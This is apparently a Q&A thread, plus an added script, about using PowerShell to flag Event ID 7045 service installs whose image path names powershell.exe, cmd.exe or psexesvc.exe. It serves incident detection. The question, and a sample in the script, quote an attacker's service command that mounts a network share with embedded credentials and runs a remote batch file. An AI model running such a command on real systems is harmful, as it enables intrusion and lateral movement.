
Thank you for all the help I've gotten so far, much appreciated. I have been trying to achieve a simple task: to compare the "Image Path" of an Event ID 7045 with a set of pre-defined keywords. The Like isn't working and Compare looks for an exact match.

$sus = @('powershell.exe','cmd.exe','psexesvc.exe')
$7045 = Get-WinEvent -FilterHashtable @{ Path = "System.evtx"; Id = 7045 } |
    select @{N='Timestamp';E={$_.TimeCreated.ToUniversalTime().ToString('yyyy-MM-ddTHH:mm:ssZ')}},
           Id,
           @{N='Machine Name';E={$_.MachineName}},
           @{N='Service Name';E={$_.Properties[0].Value}},
           @{N='Image Path';E={$_.Properties[1].Value}},
           @{N='RunAsUser';E={$_.Properties[4].Value}},
           @{N='Installed By';E={$_.UserId}} |
    where 'Image Path' -match $sus

I mean, if any of the keywords hit a match, I'd be interested!

To give you an idea, one of the many, many malicious services installed by a Threat Actor looked like:

cmd.exe /c powershell -c "net use \\192.168.100.100 /user:workgroup\test p@ssw0rd123;cmd.exe /c \\192.168.100.100\OutPut\run.bat"

So I kinda have many examples but .. if there was a way to get the Like operator to work here, fantastic!

Thank you :)

1 Answer


You can use regex -match instead of like. For that, you need to create a regex string from the executables, combining the names with regex 'OR' (|) and escape the dot with a backslash:

# create a regex for the suspicious executables:
$sus = '(powershell|cmd|psexesvc)\.exe'
# alternatively you can join the array items like this:
# $sus = ('powershell.exe','cmd.exe','psexesvc.exe' | ForEach-Object {[regex]::Escape($_)}) -join '|'

$7045 = Get-WinEvent -FilterHashtable @{ LogName = 'System';Id = 7045 } | 
        Where-Object { $_.Properties[1].Value -match $sus } |
        Select-Object Id, 
                      @{N='Timestamp';E={$_.TimeCreated.ToUniversalTime().ToString('yyyy-MM-ddTHH:mm:ssZ')}}, 
                      @{N='Machine Name';E={$_.MachineName}},
                      @{N='Service Name'; E={$_.Properties[0].Value}},
                      @{N='Image Path'; E={$_.Properties[1].Value}},
                      @{N='RunAsUser'; E={$_.Properties[4].Value}},
                      @{N='Installed By'; E={$_.UserId}}
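As an added illustration of the answer above (my own example, not code from the question or the answer), the script below wraps the escape-and-join step in a small function, tests it against a few constructed image paths including the one quoted in the question, and then applies the same pattern to Event ID 7045 records. The function names `New-KeywordRegex` and `Test-ImagePath` and the parameter names are my own choices. It also shows why the original `-match $sus` could never hit: when the right-hand side of `-match` is an array, PowerShell stringifies it into one space-joined value ("powershell.exe cmd.exe psexesvc.exe"), which no image path contains.

```powershell
# Added example: regex-based keyword matching for 7045 "service installed" events.
# New-KeywordRegex / Test-ImagePath are hypothetical helper names chosen here.

function New-KeywordRegex {
    param([Parameter(Mandatory)][string[]]$Keyword)
    # [regex]::Escape turns 'cmd.exe' into 'cmd\.exe' so the dot is literal;
    # joining with '|' yields one alternation that -match tests in a single pass.
    ($Keyword | ForEach-Object { [regex]::Escape($_) }) -join '|'
}

function Test-ImagePath {
    param(
        [Parameter(Mandatory)][AllowEmptyString()][string]$ImagePath,
        [Parameter(Mandatory)][string[]]$Keyword
    )
    $pattern = New-KeywordRegex -Keyword $Keyword
    # -match is case-insensitive by default, so 'PSEXESVC.EXE' is caught as well;
    # use -cmatch if a case-sensitive comparison is wanted.
    if ($ImagePath -match $pattern) {
        [pscustomobject]@{ Suspicious = $true;  Hit = $Matches[0]; ImagePath = $ImagePath }
    } else {
        [pscustomobject]@{ Suspicious = $false; Hit = $null;       ImagePath = $ImagePath }
    }
}

$sus = @('powershell.exe', 'cmd.exe', 'psexesvc.exe')

# Why the original comparison failed: an array on the right of -match is
# joined with spaces into a single string before the comparison runs.
"Original RHS became: '$($sus)'"

# Constructed sample image paths; the first is the one quoted in the question.
$samples = @(
    'cmd.exe /c powershell -c "net use \\192.168.100.100 /user:workgroup\test p@ssw0rd123;cmd.exe /c \\192.168.100.100\OutPut\run.bat"',
    'C:\Windows\system32\svchost.exe -k netsvcs',
    '%SystemRoot%\PSEXESVC.EXE'
)
$samples | ForEach-Object { Test-ImagePath -ImagePath $_ -Keyword $sus } | Format-Table -AutoSize

# Apply the same pattern to real 7045 events: either the live System log ...
$events = Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045 } -ErrorAction SilentlyContinue
# ... or a collected copy of the log, as the question does:
# $events = Get-WinEvent -FilterHashtable @{ Path = 'System.evtx'; Id = 7045 } -ErrorAction SilentlyContinue

$pattern = New-KeywordRegex -Keyword $sus
$events |
    Where-Object { $_.Properties[1].Value -match $pattern } |
    Select-Object @{N='Timestamp';E={$_.TimeCreated.ToUniversalTime().ToString('yyyy-MM-ddTHH:mm:ssZ')}},
                  @{N='Service Name';E={$_.Properties[0].Value}},
                  @{N='Image Path';E={$_.Properties[1].Value}},
                  @{N='RunAsUser';E={$_.Properties[4].Value}}
```

Filtering in `Where-Object` before `Select-Object` (as the answer does) keeps the comparison on the raw `Properties[1].Value` rather than on a renamed calculated property, and `-ErrorAction SilentlyContinue` suppresses the "No events were found" error that `Get-WinEvent` raises when nothing matches the filter hashtable. The `$Matches[0]` column records which keyword fired, which is useful when triaging many hits.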